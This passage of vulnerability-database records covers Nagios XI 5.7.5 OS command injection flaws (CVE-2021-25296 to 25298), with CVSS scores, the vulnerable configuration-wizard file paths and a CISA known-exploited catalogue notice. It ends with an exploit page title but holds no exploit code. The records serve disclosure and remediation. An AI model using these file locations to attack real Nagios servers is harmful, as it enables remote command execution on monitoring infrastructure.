"AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:20:00", "description": "Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-15T13:15:00", "type": "cve", "title": "CVE-2021-25298", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25298"], "modified": "2021-03-04T16:44:00", "cpe": ["cpe:/a:nagios:nagios_xi:5.7.5"], "id": "CVE-2021-25298", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-25298", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:nagios:nagios_xi:5.7.5:*:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2022-05-20T20:36:55", "description": "Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-15T00:00:00", "type": "attackerkb", "title": "CVE-2021-25297", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25297"], "modified": "2021-02-19T00:00:00", "id": "AKB:E3841EB6-6FF5-4072-8716-B4BD203AFDB0", "href": "https://attackerkb.com/topics/g6U1KDU84X/cve-2021-25297", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-04-28T23:39:26", "description": "Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/windowswmi/windowswmi.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-15T00:00:00", "type": "attackerkb", "title": "CVE-2021-25296", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25296"], "modified": "2021-02-19T00:00:00", "id": "AKB:532E90DB-4495-454E-B0D0-8DD690C03B16", "href": "https://attackerkb.com/topics/faJGD9TxcJ/cve-2021-25296", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-06-02T05:07:29", "description": "Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-15T00:00:00", "type": "attackerkb", "title": "CVE-2021-25298", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-25298"], "modified": "2021-02-19T00:00:00", "id": "AKB:58421098-D895-41C4-95F2-2B3E4E3CD2C0", "href": "https://attackerkb.com/topics/c1866NX9mx/cve-2021-25298", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2022-01-26T11:28:36", "description": "CISA has added 13 new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog >), based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.\n\n**CVE Number** | **CVE Title** | **Required Action Due Date** \n---|---|--- \nCVE-2021-32648 | October CMS Improper Authentication | 2/1/2022 \nCVE-2021-21315 | System Information Library for node.js Command Injection Vulnerability | 2/1/2022 \nCVE-2021-21975 | Server Side Request Forgery in vRealize Operations Manager API Vulnerability | 2/1/2022 \nCVE-2021-22991 | BIG-IP Traffic Microkernel Buffer Overflow Vulnerability | 2/1/2022 \nCVE-2021-25296 | Nagios XI OS Command Injection Vulnerability | 2/1/2022 \nCVE-2021-25297 | Nagios XI OS Command Injection Vulnerability | 2/1/2022 \nCVE-2021-25298 | Nagios XI OS Command Injection Vulnerability | 2/1/2022 \nCVE-2021-33766 | Microsoft Exchange Server Information Disclosure Vulnerability | 2/1/2022 \nCVE-2021-40870 | Aviatrix Controller Unrestricted Upload of File Vulnerability | 2/1/2022 \nCVE-2020-11978 | Apache Airflow Command Injection Vulnerability | 7/18/2022 \nCVE-2020-13671 | Drupal Core Unrestricted Upload of File Vulnerability | 7/18/2022 \nCVE-2020-13927 | Apache Airflow Experimental API Authentication Bypass Vulnerability | 7/18/2022 \nCVE-2020-14864 | Oracle Corporate Business Intelligence Enterprise Edition Path Traversal Vulnerability | 7/18/2022 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://www.cisa.gov/known-exploited-vulnerabilities>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog >) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities >).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/01/18/cisa-adds-13-known-exploited-vulnerabilities-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-18T00:00:00", "type": "cisa", "title": "CISA Adds 13 Known Exploited Vulnerabilities to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11978", "CVE-2020-13671", "CVE-2020-13927", "CVE-2020-14864", "CVE-2021-21315", "CVE-2021-21975", "CVE-2021-22991", "CVE-2021-25296", "CVE-2021-25297", "CVE-2021-25298", "CVE-2021-32648", "CVE-2021-33766", "CVE-2021-40870"], "modified": "2022-01-25T00:00:00", "id": "CISA:D7385BDD2786721598A2135E182282C2", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/01/18/cisa-adds-13-known-exploited-vulnerabilities-catalog", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}]}

Nagios XI 5.7.5 Remote Code Execution Exploit

Description

Related